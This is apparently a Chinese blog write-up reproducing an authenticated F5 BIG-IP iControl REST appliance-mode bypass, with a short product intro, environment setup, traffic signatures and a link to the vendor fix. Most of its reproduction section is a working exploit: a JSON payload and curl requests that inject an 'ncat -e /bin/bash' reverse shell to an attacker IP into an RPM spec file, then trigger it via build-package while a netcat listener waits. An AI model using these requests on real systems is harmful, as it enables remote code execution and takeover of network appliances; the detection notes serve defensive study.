目录
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。
0x03 漏洞概述:
在设备模式下运行时,分配了管理员角色的经过身份验证的用户可能能够利用未公开的 iControl REST 端点绕过设备模式限制。成功利用此漏洞可使攻击者跨越安全边界,在装置模式下运行时,分配了管理员角色的已验证用户可能能够利用未公开的iControl REST端点绕过装置模式限制。成功利用此漏洞可使攻击者跨越安全边界。
0x04 影响版本:
BIG-IP <17.x
0x05 环境搭建:
下载&安装
参考这篇文章: (CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现_Evan Kang的博客-CSDN博客)
登录web页面:
0x06 漏洞复现:
构造JSON Payload:
{
"specFileData": {
"name": "test",
"srcBasePath": "/tmp",
"version": "test6",
"release": "test7",
"description": "test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444",
"summary": "test9"
}
}发送请求
curl -sk -u admin:P@ssw0rd -H "Content-Type: application/json" -X POST https://192.168.119.220/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}'
查看服务端:
判断请求是否成功
cat /var/config/rest/node/tmp/*.spec
攻击主机启动监听器:
nc -lvp 4444
使用jq格式化输出:
Jq安装:
wget http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
rpm -ivh epel-release-latest-7.noarch.rpm
yum repolist
yum -y install jq
curl -X POST -k -u admin:P@ssw0rd https://192.168.119.220/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/af35efa2-483e-4b6c-a6be-0c4bf11e36b7.spec", "force": true }' | jq
监听成功:
0x07 流量分析:
特征一:
客户端:
URL:
/mgmt/shared/iapp/build-packageDATA:
- check\nncat -e /bin/bash 192.168.119.243
- specFilePath: xxx.spec
Shell流量:
0x08 修复建议:
如果您运行的是已知易受攻击的版本列中列出的版本,可以通过升级到中引入的修复 列中的值。如果该表仅列出比当前运行的版本旧的版本,或者未列出不易受攻击的版本,则当前不存在升级候选版本。
https://support.f5.com/csp/article/K13325942
1203
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
